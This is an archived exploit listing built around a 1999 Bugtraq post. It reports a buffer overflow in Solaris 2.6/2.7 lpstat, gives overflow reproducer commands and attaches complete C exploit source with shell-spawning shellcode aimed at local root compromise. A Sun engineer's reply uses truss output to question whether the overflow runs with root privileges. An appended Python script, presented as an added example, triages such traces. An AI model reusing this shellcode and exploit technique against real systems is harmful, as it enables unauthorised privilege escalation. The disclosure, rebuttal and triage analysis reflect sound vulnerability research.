lpstat.x86.c
Posted Aug 17, 1999
Authored by Plasmoid

lpstat Exploit code for Solaris 2.6/2.7 X86 versions, resulting in local root compromise.

tags | exploit, x86, local, root
systems | solaris
SHA-256 | b4a5c4a3ef8e9b18f9d8d1fc2bc0e1ddaaf747d7e6ab6689b898a8f73c30be07

Date: Tue, 26 Jan 1999 15:02:47 +0000
From: plasmoid deep/thc/clb <plasmoid@PIMMEL.COM>
To: BUGTRAQ@netspace.org
Subject: Buffer overflow in Solaris 2.6/2.7 /usr/bin/lpstat


On Aug/25/98 Sun released the following patches for lp:

Solaris2.6 Sparc: 106235-02
Solaris2.6 x86: 106236

It is quite sad that they did not fix another overflow in
/usr/bin/lpstat. I testified this bug on both Solaris 2.7 x86
and 2.6 Sparc; I assume that it is also present on Solaris 2.6
x86 and 2.7 Sparc.

Solaris 2.7 x86
% plasmoid@gorkie:foo> lpstat -c `perl -e 'print "A" x 998'`
% UX:lpstat: ERROR: Class
[...]
% AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" does
% not exist.
% TO FIX: Use the "lpstat -c all" command to list
% all known classes.
% Segmentation Fault
% plasmoid@gorkie:foo>

Solaris 2.6 Sparc
% plasmoid@bock:foo> lpstat -c `perl -e 'print "AAAA" x 250'`
% UX:lpstat: ERROR: Class
[...]
% AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" does not
% exist.
% TO FIX: Use the "lpstat -c all" command to list
% all known classes.
% Segmentation Fault
% plasmoid@bock:foo>

This overflow is definitely exploitable; I attached the exploit for
Solaris x86. Quality patches for all Solaris versions can be obtained
from www.hert.org, a fast security source.

plasmoid deep/thc/clb
http://thc.inferno.tusculum.edu


/*
* lpstat sploit for solaris 2.6/2.7
* by plasmoid/deep/thc <plasmoid@pimmel.com> (c) 1999
* supported by insected and wilkins
*
* THC - The Hacker's Choice
* http://thc.inferno.tusculum.edu
*/



#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>


char shell[] =
"\xeb\x48\x9a\xff\xff\xff\xff\x07\xff\xc3\x5e\x31\xc0\x89\x46\xb4"
"\x88\x46\xb9\x88\x46\x07\x89\x46\x0c\x31\xc0\x50\xb0\x8d\xe8\xdf"
"\xff\xff\xff\x83\xc4\x04\x31\xc0\x50\xb0\x17\xe8\xd2\xff\xff\xff"
"\x83\xc4\x04\x31\xc0\x50\x8d\x5e\x08\x53\x8d\x1e\x89\x5e\x08\x53"
"\xb0\x3b\xe8\xbb\xff\xff\xff\x83\xc4\x0c\xe8\xbb\xff\xff\xff\x2f"
"\x62\x69\x6e\x2f\x73\x68\xff\xff\xff\xff\xff\xff\xff\xff\xff";

const int buffersize=1100;
const char x86_nop=0x90;
long nop,esp;
long offset=0;
char buffer[2000];

long get_esp() { __asm__("movl %esp,%eax"); }

int main (int argc, char *argv[]) {
int i;

/* you shouldn't edit the offset, we run with
800 nops in a 1100 byte buffer, one of those
nops should be hit */

if (argc > 1) offset = strtol(argv[1], NULL, 0);

/* if you don't succeed, modify the nop count,
the standard value of 801 bytes is quite
strange enough */

if (argc > 2) nop = strtoul(argv[2], NULL, 0);
else
nop = 801;

esp = get_esp();

memset(buffer, x86_nop, buffersize);
memcpy(buffer+nop, shell, strlen(shell));
for (i = nop+strlen(shell); i < buffersize-4; i += 4)
*((int *) &buffer[i]) = esp+offset;

execl("/usr/bin/lpstat", "lpstat", "-c", buffer, NULL);

printf("exec failed!\n");
return 0;
}

---------------------------------------------------------------------

Date: Thu, 28 Jan 1999 21:32:28 +0100
From: Casper Dik <casper@HOLLAND.SUN.COM>
To: BUGTRAQ@netspace.org
Subject: Re: Buffer overflow in Solaris 2.6/2.7 /usr/bin/lpstat

>On Aug/25/98 Sun released the following patches for lp:
>
> Solaris2.6 Sparc: 106235-02
> Solaris2.6 x86: 106236
>
>It is quite sad, that they did not fix another overflow in
>/usr/bin/lpstat. I testified this bug on either Solaris 2.7 x86
>and 2.6 Sparc, I assume that it is also present on Solaris 2.6
>x86 and 2.7 Sparc.
>
>Solaris 2.7 x86
>% plasmoid@gorkie:foo> lpstat -c `perl -e 'print "A" x 998'`
>% UX:lpstat: ERROR: Class
> [...]
>% AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" does
>% not exist.
>% TO FIX: Use the "lpstat -c all" command to list
>% all known classes.
>% Segmentation Fault
>% plasmoid@gorkie:foo>


Hm, but if you look at it with truss another picture appears:

It appears that the program that core dumps is /usr/lib/lp/local/lpstat.
That program is not set-uid. The intervening shell (hm, someone using
system again???) resets the uid.

9125: execve("/usr/bin/lpstat", 0xFFBEF3DC, 0xFFBEF3EC) argc = 3
9125: *** SUID: ruid/euid/suid = 21782 / 0 / 0 ***
9125: *** SGID: rgid/egid/sgid = 320 / 320 / 320 ***
9125: argv: lpstat -c
9125:
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
9126: execve("/bin/sh", 0xFFBEEB98, 0xFFBEF404) argc = 3
9126: argv: sh -c
9126: /usr/lib/lp/local/lpstat -c
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
9126: setuid(21782) = 0
9128: execve("/usr/lib/lp/local/lpstat", 0x0003A654, 0x0003A664) argc = 3
9128: *** SUID: ruid/euid/suid = 21782 / 21782 / 21782 ***
9128: argv: /usr/lib/lp/local/lpstat -c
9128:
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
UX:lpstat: ERROR: Class
"xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx" does
not exist.
TO FIX: Use the "lpstat -c all" command to list
all known classes.
9128: Incurred fault #6, FLTBOUNDS %pc = 0xFF2B679C
9128: siginfo: SIGSEGV SEGV_MAPERR addr=0x78787878
9128: Received signal #11, SIGSEGV [default]
9128: siginfo: SIGSEGV SEGV_MAPERR addr=0x78787878
9128: *** process killed ***
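A defender-side way to automate the check Casper Dik does by hand above. This is an added example, not code from either post: it parses `truss -f` output, tracks each pid's reported uids and any successful setuid() call, and reports whether the process that caught SIGSEGV still had euid 0. The trace constant is a constructed, shortened copy of the one in the reply; the regexes assume truss's line layout as shown there.

```python
"""Triage a truss -f trace: did the segfault happen in a privileged process?"""
import re
from dataclasses import dataclass, field
from typing import Optional

# Constructed sample, shortened from the truss output in the reply above.
SAMPLE_TRACE = """\
9125: execve("/usr/bin/lpstat", 0xFFBEF3DC, 0xFFBEF3EC) argc = 3
9125: *** SUID: ruid/euid/suid = 21782 / 0 / 0 ***
9125: argv: lpstat -c xxxxxxxx
9126: execve("/bin/sh", 0xFFBEEB98, 0xFFBEF404) argc = 3
9126: argv: sh -c /usr/lib/lp/local/lpstat -c xxxxxxxx
9126: setuid(21782) = 0
9128: execve("/usr/lib/lp/local/lpstat", 0x0003A654, 0x0003A664) argc = 3
9128: *** SUID: ruid/euid/suid = 21782 / 21782 / 21782 ***
9128: Incurred fault #6, FLTBOUNDS %pc = 0xFF2B679C
9128: Received signal #11, SIGSEGV [default]
9128: *** process killed ***
"""

EXEC_RE = re.compile(r'^(\d+):\s+execve\("([^"]+)"')
IDS_RE = re.compile(r'^(\d+):\s+\*\*\* SUID: ruid/euid/suid = (\d+) / (\d+) / (\d+)')
SETUID_RE = re.compile(r'^(\d+):\s+setuid\((\d+)\)\s+=\s+0')
SIG_RE = re.compile(r'^(\d+):\s+Received signal #\d+, (\w+)')

@dataclass
class Triage:
    privileged_execs: list = field(default_factory=list)  # (pid, path) running with euid 0
    drops: list = field(default_factory=list)             # (pid, uid) privilege drops via setuid()
    crash: Optional[tuple] = None                         # (pid, path, signal, euid at crash)

def triage(trace: str) -> Triage:
    path, euid, out = {}, {}, Triage()   # per-pid last exec'd program / effective uid
    for line in trace.splitlines():
        if m := EXEC_RE.match(line):
            path[m[1]] = m[2]
        elif m := IDS_RE.match(line):
            pid, ruid, eff = m[1], int(m[2]), int(m[3])
            euid[pid] = eff
            if eff == 0 and ruid != 0:                    # set-uid root wrapper
                out.privileged_execs.append((pid, path.get(pid)))
        elif m := SETUID_RE.match(line):                  # successful setuid(): new euid
            euid[m[1]] = int(m[2])
            out.drops.append((m[1], int(m[2])))
        elif m := SIG_RE.match(line):
            out.crash = (m[1], path.get(m[1]), m[2], euid.get(m[1]))
    return out

def crash_is_privileged(t: Triage) -> bool:
    """True only if the crashing process still had euid 0 (a real root risk)."""
    return t.crash is not None and t.crash[3] == 0
```

On the sample trace this reports the set-uid wrapper (9125), the uid drop in the intervening shell (9126), and a crash in 9128 at euid 21782, so `crash_is_privileged` is False, matching the reply's conclusion.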
